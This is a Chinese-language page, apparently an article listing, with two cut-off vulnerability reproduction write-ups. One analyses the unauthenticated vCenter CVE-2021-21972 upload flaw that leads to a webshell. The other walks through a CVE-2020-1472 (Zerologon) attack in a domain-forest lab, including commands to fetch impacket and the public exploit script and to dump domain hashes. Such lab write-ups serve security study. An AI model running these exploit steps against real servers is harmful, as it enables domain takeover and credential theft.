CVE-2021-21972 复现和分析
0x01 背景vSphere是VMware推出的虚拟化平台套件,包含ESXi、vCenter Server等一系列的软件。其中vCenter Server为 ESXi的控制中心,可从单一控制点统一管理数据中心的所有vSphere主机和虚拟机,使得IT管理员能够提高控制能力,简化入场任务,并降低IT环境的管理复杂性与成本。 vSphere Client(HTML5)在vCenter Server插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放443端口的服务器向vCenter Server发送精心构造的请求,从而在服务器上写入webshell,最终造成远程任意代码执行。 0x02 代码分析vCenter Server的vROPS插件的API未经过鉴权,存在一些敏感接口。其中 uploadova 接口存在一个上传 OVA 文件的功能: @RequestMapping( value = {"/uploadova"}, method = {RequestMethod.POST})public void...
林级域环境下复现CVE-2020-1472
环境 域林环境 根DC:10.100.100.100(server2019) 一级林DC:10.100.100.101(server2016) 二级林DC:10.100.100.102(server2012R2) 跳板机(攻击机):10.100.100.105(WIN10) 简要拓扑 过程 利用过程:将域控机器账户密码设置为空->读取域管hash->读取sam文件hash(ntds.dit)->恢复域控机器账户密码 攻击首先安装impacket: git clone https://github.com/SecureAuthCorp/impacket.gitcd impacketpip install -r requirements.txtpython setup.py install 然后下载利用脚本 git clone https://github.com/dirkjanm/CVE-2020-1472cd CVE-2020-1472 直接拿根域测,执行 python cve-2020-1472-exploit.py AD...